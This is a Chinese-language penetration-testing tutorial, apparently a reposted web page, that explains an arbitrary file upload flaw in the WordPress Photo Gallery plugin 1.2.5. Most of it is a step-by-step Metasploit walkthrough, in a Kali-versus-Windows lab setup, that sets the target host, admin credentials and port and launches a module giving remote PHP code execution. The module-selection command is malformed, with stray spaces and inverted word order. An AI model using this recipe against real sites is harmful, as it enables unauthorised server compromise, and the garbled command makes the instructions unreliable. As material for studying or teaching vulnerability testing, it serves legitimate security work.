渗透测试实战教程:利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试

WordPress的照片库插件包含一个允许远程攻击者执行任意PHP代码的漏洞。这个缺陷的存在是因为photo-gallery \ photo-gallery.php脚本允许访问filemanager \ UploadHandler.php。UploadHandler.php中的post()方法无法正确验证或清理用户上传的文件。
利用目标
照片库插件,版本1.2.5。
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole
利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试
现在输入  exploit use / unix / webapp / wp_ photo_gallery_unrestricted_file_upload
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi /wordpress
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123
msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80
msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit
利用WordPress图片库模块的任意文件上传漏洞来进行渗透测试
转载请注明本文链接: http://www.mayidui.net/t2317.html
游客
登录后才可以回帖,登录 或者 注册